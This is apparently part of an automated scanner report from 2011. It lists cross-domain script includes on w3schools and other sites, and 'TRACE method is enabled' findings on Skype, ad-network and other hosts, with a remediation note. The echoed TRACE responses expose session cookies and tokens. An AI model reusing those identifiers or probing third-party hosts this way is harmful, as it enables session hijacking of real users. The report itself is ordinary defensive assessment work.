HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 16:20:42 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 27121

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Information Security | Complianc
...[SNIP]...
<meta name="robots" content="index,follow" />
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script>
...[SNIP]...

18.909. https://www.trustwave.com/web-application-firewall/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.trustwave.com
Path:   /web-application-firewall/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /web-application-firewall/ HTTP/1.1
Host: www.trustwave.com
Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Houlihan+Lokey#sclient=psy&hl=en&source=hp&q=waf+web+application+security&pbx=1&oq=waf+web+application+security&aq=f&aqi=q-w1&aql=&gs_sm=e&gs_upl=21435l26606l1l26840l27l19l0l6l6l6l1160l12427l5-2.3.8l13l0&bav=on.2,or.r_gc.r_pw.&fp=b7e6040383bebbf&biw=1049&bih=910
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 16:19:15 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31683

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Web Application Firewall | Trust
...[SNIP]...
<meta name="robots" content="index,follow" />
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script>
...[SNIP]...

18.910. http://www.w3schools.com/banners/aspallbannerframe.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.w3schools.com
Path:   /banners/aspallbannerframe.asp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /banners/aspallbannerframe.asp HTTP/1.1
Host: www.w3schools.com
Proxy-Connection: keep-alive
Referer: http://www.w3schools.com/jsref/dom_obj_base.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQCSSTBCB=AAMPJHHBNDGEJJEIDNKGBHML; __utma=119627022.1478965365.1315189423.1315189423.1315189423.1; __utmb=119627022.22.10.1315189423; __utmc=119627022; __utmz=119627022.1315189423.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Referrer%20data%20found%20in%20displayed%20innerHTML

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 02:34:22 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Content-Length: 496
Content-Type: text/html
Expires: Mon, 05 Sep 2011 02:34:22 GMT
Cache-control: private


<html>
<head>
<meta http-equiv="pragma" content="no-cache" />
<meta http-equiv="cache-control" content="no-cache" />
</head>
<body style="background-color:#ffffff;margin:0;padding:0;">
<div cl
...[SNIP]...
</div>
<script type='text/javascript' language='Javascript' src='http://s1.lqcdn.com/m.min.js?dt=2.3.110104.1'></script>
...[SNIP]...

18.911. http://www.w3schools.com/banners/aspallframe.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.w3schools.com
Path:   /banners/aspallframe.asp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /banners/aspallframe.asp HTTP/1.1
Host: www.w3schools.com
Proxy-Connection: keep-alive
Referer: http://www.w3schools.com/jsref/dom_obj_base.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQCSSTBCB=AAMPJHHBNDGEJJEIDNKGBHML; __utma=119627022.1478965365.1315189423.1315189423.1315189423.1; __utmb=119627022.22.10.1315189423; __utmc=119627022; __utmz=119627022.1315189423.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Referrer%20data%20found%20in%20displayed%20innerHTML

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 02:34:20 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Content-Length: 745
Content-Type: text/html
Expires: Mon, 05 Sep 2011 02:34:20 GMT
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="pragma" content="no-cache" />
<meta http
...[SNIP]...
</div>
<script type='text/javascript' language='Javascript' src='http://s1.lqcdn.com/m.min.js?dt=2.3.110104.1'></script>
...[SNIP]...

18.912. http://www.w3schools.com/js/js_ex_dom.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.w3schools.com
Path:   /js/js_ex_dom.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /js/js_ex_dom.asp HTTP/1.1
Host: www.w3schools.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Referrer+data+found+in+displayed+innerHTML#sclient=psy&hl=en&source=hp&q=Referrer+data+displayed+innerHTML&pbx=1&oq=Referrer+data+displayed+innerHTML&aq=f&aqi=&aql=&gs_sm=e&gs_upl=9979l11361l0l11816l9l8l0l0l0l1l906l906l6-1l1l0&bav=on.2,or.r_gc.r_pw.&fp=b7e6040383bebbf&biw=1266&bih=910
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 02:23:04 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Pragma: no-cache
Content-Length: 35820
Content-Type: text/html
Expires: Mon, 05 Sep 2011 02:22:04 GMT
Cache-control: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<h
...[SNIP]...
<div style="width:960px;height:94px;position:relative;margin-left:auto;margin-right:auto;margin:0px;padding:0px;overflow:hidden">
<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...
<!-- **** SPOTLIGHTS 1 **** -->
<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...
<!-- **** SPOTLIGHTS 2 **** -->

<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script><script src="//translate.google.com/translate_a/element.js?cb=googleTranslateElementInit" type="text/javascript"></script>
...[SNIP]...

18.913. http://www.w3schools.com/jsref/dom_obj_base.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.w3schools.com
Path:   /jsref/dom_obj_base.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /jsref/dom_obj_base.asp HTTP/1.1
Host: www.w3schools.com
Proxy-Connection: keep-alive
Referer: http://www.w3schools.com/js/js_ex_dom.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQCSSTBCB=AAMPJHHBNDGEJJEIDNKGBHML; __utma=119627022.1478965365.1315189423.1315189423.1315189423.1; __utmb=119627022.21.10.1315189423; __utmc=119627022; __utmz=119627022.1315189423.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Referrer%20data%20found%20in%20displayed%20innerHTML

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 02:34:16 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Pragma: no-cache
Content-Length: 21706
Content-Type: text/html
Expires: Mon, 05 Sep 2011 02:33:16 GMT
Cache-control: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<h
...[SNIP]...
<div style="width:960px;height:94px;position:relative;margin-left:auto;margin-right:auto;margin:0px;padding:0px;overflow:hidden">
<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...
<!-- **** SPOTLIGHTS 1 **** -->
<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...
<!-- **** SPOTLIGHTS 2 **** -->

<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script><script src="//translate.google.com/translate_a/element.js?cb=googleTranslateElementInit" type="text/javascript"></script>
...[SNIP]...

18.914. http://www.w3schools.com/jsref/dom_obj_frame.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.w3schools.com
Path:   /jsref/dom_obj_frame.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /jsref/dom_obj_frame.asp HTTP/1.1
Host: www.w3schools.com
Proxy-Connection: keep-alive
Referer: http://www.w3schools.com/js/js_ex_dom.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQCSSTBCB=AAMPJHHBNDGEJJEIDNKGBHML; __utma=119627022.1478965365.1315189423.1315189423.1315189423.1; __utmb=119627022.25.10.1315189423; __utmc=119627022; __utmz=119627022.1315189423.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Referrer%20data%20found%20in%20displayed%20innerHTML

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 02:34:36 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Pragma: no-cache
Content-Length: 24461
Content-Type: text/html
Expires: Mon, 05 Sep 2011 02:33:36 GMT
Cache-control: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<h
...[SNIP]...
<div style="width:960px;height:94px;position:relative;margin-left:auto;margin-right:auto;margin:0px;padding:0px;overflow:hidden">
<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...
<!-- **** SPOTLIGHTS 1 **** -->
<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...
<!-- **** SPOTLIGHTS 2 **** -->

<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script><script src="//translate.google.com/translate_a/element.js?cb=googleTranslateElementInit" type="text/javascript"></script>
...[SNIP]...

18.915. http://www.w3schools.com/jsref/event_frame_onload.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.w3schools.com
Path:   /jsref/event_frame_onload.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /jsref/event_frame_onload.asp HTTP/1.1
Host: www.w3schools.com
Proxy-Connection: keep-alive
Referer: http://www.w3schools.com/jsref/dom_obj_frame.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQCSSTBCB=AAMPJHHBNDGEJJEIDNKGBHML; __utma=119627022.1478965365.1315189423.1315189423.1315189423.1; __utmb=119627022.27.10.1315189423; __utmc=119627022; __utmz=119627022.1315189423.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Referrer%20data%20found%20in%20displayed%20innerHTML

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 02:37:07 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Pragma: no-cache
Content-Length: 23546
Content-Type: text/html
Expires: Mon, 05 Sep 2011 02:36:07 GMT
Cache-control: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<h
...[SNIP]...
<div style="width:960px;height:94px;position:relative;margin-left:auto;margin-right:auto;margin:0px;padding:0px;overflow:hidden">
<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...
<!-- **** SPOTLIGHTS 1 **** -->
<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...
<!-- **** SPOTLIGHTS 2 **** -->

<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script><script src="//translate.google.com/translate_a/element.js?cb=googleTranslateElementInit" type="text/javascript"></script>
...[SNIP]...

18.916. http://www.w3schools.com/tryitbanner.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.w3schools.com
Path:   /tryitbanner.asp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /tryitbanner.asp?secid=tryjs&rnd=0.4725153 HTTP/1.1
Host: www.w3schools.com
Proxy-Connection: keep-alive
Referer: http://www.w3schools.com/js/tryit.asp?filename=tryjs_text
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQCSSTBCB=AAMPJHHBNDGEJJEIDNKGBHML; __utma=119627022.1478965365.1315189423.1315189423.1315189423.1; __utmb=119627022.1.10.1315189423; __utmc=119627022; __utmz=119627022.1315189423.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Referrer%20data%20found%20in%20displayed%20innerHTML

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 02:30:44 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Content-Length: 1898
Content-Type: text/html
Expires: Mon, 05 Sep 2011 02:30:44 GMT
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
<div style="width:960px;height:94px;position:relative;margin-left:auto;margin-right:auto;margin:0px;padding:0px;overflow:hidden">
<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...

18.917. http://www.wallstreetoasis.com/forums/houlihan-lokey-exit-opps  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wallstreetoasis.com
Path:   /forums/houlihan-lokey-exit-opps

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /forums/houlihan-lokey-exit-opps HTTP/1.1
Host: www.wallstreetoasis.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Houlihan+Lokey
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 16:14:09 GMT
Server: Apache/2.2.8 (Ubuntu)
X-Powered-By: PHP/5.2.4-2ubuntu5.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
X-Drupal-Cache: MISS
Set-Cookie: SESS9095464dfa38d76be5c0e87191926453=ba27f64d25c838f1de7819db7dc7e5ce; expires=Tue, 27 Sep 2011 19:47:29 GMT; path=/; domain=.wallstreetoasis.com
Last-Modified: Sun, 04 Sep 2011 16:14:09 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 161677


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<met
...[SNIP]...
<link rel="shortcut icon" href="/files/favicon.ico" type="image/x-icon" />
<script type='text/javascript' src='//s7.addthis.com/js/250/addthis_widget.js#async=1'></script>
...[SNIP]...
</script>

   <script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'></script>
...[SNIP]...
</div>
<script src="http://widgets.twimg.com/j/1/widget.js"></script>
...[SNIP]...
<div id="block-block-71" class="block block-block">


<script src="http://www.hellobar.com/hellobar.js"></script>
...[SNIP]...

19. TRACE method is enabled  previous  next
There are 22 instances of this issue:

Issue description

The TRACE method is designed for diagnostic purposes. If enabled, the web server will respond to requests which use the TRACE method by echoing in its response the exact request which was received.

Although this behaviour is apparently harmless in itself, it can sometimes be leveraged to support attacks against other application users. If an attacker can find a way of causing a user to make a TRACE request, and can retrieve the response to that request, then the attacker will be able to capture any sensitive data which is included in the request by the user's browser, for example session cookies or credentials for platform-level authentication. This may exacerbate the impact of other vulnerabilities, such as cross-site scripting.

Issue remediation

The TRACE method should be disabled on the web server.


19.1. http://142.xg4ken.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://142.xg4ken.com
Path:   /

Request

TRACE / HTTP/1.0
Host: 142.xg4ken.com
Cookie: af8182ff0973f745

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 16:18:39 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: 142.xg4ken.com
Cookie: af8182ff0973f745; kenshoo_id=200d2a28-23e9-a048-8372-00005235d564


19.2. http://afe.specificclick.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://afe.specificclick.net
Path:   /

Request

TRACE / HTTP/1.0
Host: afe.specificclick.net
Cookie: 1c8a6547a30cd28c

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Content-Type: message/http
Content-Length: 130
Date: Mon, 05 Sep 2011 02:30:53 GMT
Connection: close

TRACE / HTTP/1.0
host: afe.specificclick.net
cookie: 1c8a6547a30cd28c; JSESSIONID=76c8b6bd9362121274a3e06817e9; ADVIVA=NOTRACK

19.3. http://apps.sapha.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://apps.sapha.com
Path:   /

Request

TRACE / HTTP/1.0
Host: apps.sapha.com
Cookie: 7bc92b995d4c1044

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 16:19:35 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: apps.sapha.com
Cookie: 7bc92b995d4c1044; sapha_tst_2522=TRUE; sapha_tst_2522d676731898c6b3c196be1bfc=TRUE; sapha_tst_2522ebef1%5c%27%3bb3eed4f80dc=TRUE; sapha_tst_2522b0cf7=TRUE; sapha_2522_1=1038377%7C214589%7C149788%7C2011-09-04+10%3A19%3
...[SNIP]...

19.4. http://apr.lijit.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://apr.lijit.com
Path:   /

Request

TRACE / HTTP/1.0
Host: apr.lijit.com
Cookie: 9592a85db7cf014f

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 02:30:52 GMT
Server: PWS/1.7.3.3
X-Px: nc lax-agg-n20 ( origin>CONN)
Content-Length: 713
Content-Type: message/http
Connection: close

TRACE / HTTP/1.1
Host: vapr.lijit.com
User-Agent: Mozilla/5.0 (compatible; Panther)
Accept: */*
Accept-Encoding: gzip
Via: 1.1 lax-agg-n20.panthercdn.com PWS/1.7.3.3
X-Forwarded-For: 50.23.123.106, 66.114.50.85
X-Forwarded-IP: 50.23.123.106
X-Initial-Url: http://apr.lijit.com/
Cookie: 9592a85db7cf014f; ljtrtb=eJyrVjJUslIysjQytbQ0NrQwsjQ3NTE0MTc3VKoFAFC9Bds%3D; user=deleted; kohanasession=qle8v548jauct2oscav3q130d3; kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiJxbGU4djU0OGphdWN0Mm9zY2F2M3ExMzBkMyI7dG90Y
...[SNIP]...

19.5. http://blogs.skype.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /

Request

TRACE / HTTP/1.0
Host: blogs.skype.com
Cookie: f598a3803f8ccfc5

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:05:34 GMT
Server: Apache/2.2.0 (Fedora)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: blogs.skype.com
Cookie: f598a3803f8ccfc5; s_vi=[CS]v1|2731DE37051D260E-4000010C00147A96[CE]; skype-session-token=1881419e1eee3fb8450596c7441d08afecceb824; skype-login=t86pb1r0mu6sbpo95hdcctf9i7; SC=CC=:CCY=:LC=en-us:LIM=:TM=1315170217:TS=131
...[SNIP]...

19.6. https://blogs.skype.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://blogs.skype.com
Path:   /

Request

TRACE / HTTP/1.0
Host: blogs.skype.com
Cookie: db879d10e59c5c56

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:24 GMT
Server: Apache/2.2.0 (Fedora)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: blogs.skype.com
Cookie: db879d10e59c5c56; VISITORID=1344388383; LithiumUserInfo=""; mbox=session#1314116641836-449310#1314120755|PC#1314116641836-449310.19#1316710895|check#true#1314118955; s_nr=1314120062684-New; __utma=242698589.1857710967
...[SNIP]...

19.7. http://cache.specificmedia.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cache.specificmedia.com
Path:   /

Request

TRACE / HTTP/1.0
Host: cache.specificmedia.com
Cookie: 9ecbc8f1c328d1e0

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 02:30:56 GMT
Server: PWS/1.7.3.3
X-Px: nc lax-agg-n14 ( origin>CONN)
Content-Length: 347
Content-Type: message/http
Connection: close

TRACE / HTTP/1.1
host: ads.specificmedia.com
user-agent: Mozilla/5.0 (compatible; Panther)
accept: */*
via: 1.1 lax-agg-n14.panthercdn.com PWS/1.7.3.3
x-forwarded-for: 50.23.123.106, 66.114.50.79
x-forwarded-ip: 50.23.123.106
x-initial-url: http://cache.specificmedia.com/
cookie: 9ecbc8f1c328d1e0; ADVIVA=NOTRACK
connection: keep-alive

19.8. http://ce.lijit.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ce.lijit.com
Path:   /

Request

TRACE / HTTP/1.0
Host: ce.lijit.com
Cookie: 63c6960d0a2d1722

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 02:30:54 GMT
Server: PWS/1.7.3.3
X-Px: nc lax-agg-n55 ( origin>CONN)
Content-Length: 720
Content-Type: message/http
Connection: close

TRACE / HTTP/1.1
Host: vap.lijit.com
User-Agent: Mozilla/5.0 (compatible; Panther)
Accept: */*
Accept-Encoding: gzip
Via: 1.1 lax-agg-n55.panthercdn.com PWS/1.7.3.3
X-Forwarded-For: 50.23.123.106, 66.114.50.65
X-Forwarded-IP: 50.23.123.106
X-Initial-Url: http://ce.lijit.com/
Cookie: 63c6960d0a2d1722; user=deleted; kohanasession=qle8v548jauct2oscav3q130d3; ljt_csync=rtb_turn%2Crtb_simplifi%2Crtb_mmath%2C1; kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiJxbGU4djU0OGphdWN0Mm9zY2F2M3ExMzBkMyI7dG90YWxfaGl0c
...[SNIP]...

19.9. http://dce.sapha.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dce.sapha.com
Path:   /

Request

TRACE / HTTP/1.0
Host: dce.sapha.com
Cookie: 7cf783bc9ad1f6d8

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 16:19:11 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: dce.sapha.com
Cookie: 7cf783bc9ad1f6d8; sapha_tst_2522=TRUE; sapha_2522_1=1038376%7C214589%7C149788%7C2011-09-04+10%3A18%3A45


19.10. https://developer.skype.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://developer.skype.com
Path:   /

Request

TRACE / HTTP/1.0
Host: developer.skype.com
Cookie: 31cb0b377ae914af

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:07:23 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: developer.skype.com
Cookie: 31cb0b377ae914af; _mysapp_v2=BAh7BzoPc2Vzc2lvbl9pZCIlY2Y5NjY3NDcwMDVhODUwYTgyYTEzZDZjYzBkOGIyZTQ6DnBhZ2VfbW9kZUkiCXZpZXcGOgZFRg%3D%3D--5b0f3cac52403de90bd5ee3cef7d8eb8aeb543ca; s_vi=[CS]v1|2731DE37051D260E-4000010C001
...[SNIP]...

19.11. http://embed.technorati.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://embed.technorati.com
Path:   /

Request

TRACE / HTTP/1.0
Host: embed.technorati.com
Cookie: c826968d729a80c6

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:18:34 GMT
Server: Apache
Content-Type: message/http
Connection: close

TRACE / HTTP/1.1
Host: embed.technorati.com
Cookie: c826968d729a80c6
X-Forwarded-For: 50.23.123.106, 50.23.123.106
X-Forwarded-Host: embed.technorati.com
X-Forwarded-Server: www.technorati.com
Connection: Keep-Alive


19.12. http://pixel.33across.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.33across.com
Path:   /

Request

TRACE / HTTP/1.0
Host: pixel.33across.com
Cookie: 1e76fedb9daa276a

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:13:42 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: pixel.33across.com
Cookie: 1e76fedb9daa276a; 33x_ps=u%3D8939182109%3As1%3D1314119008217%3Ats%3D1314119008217
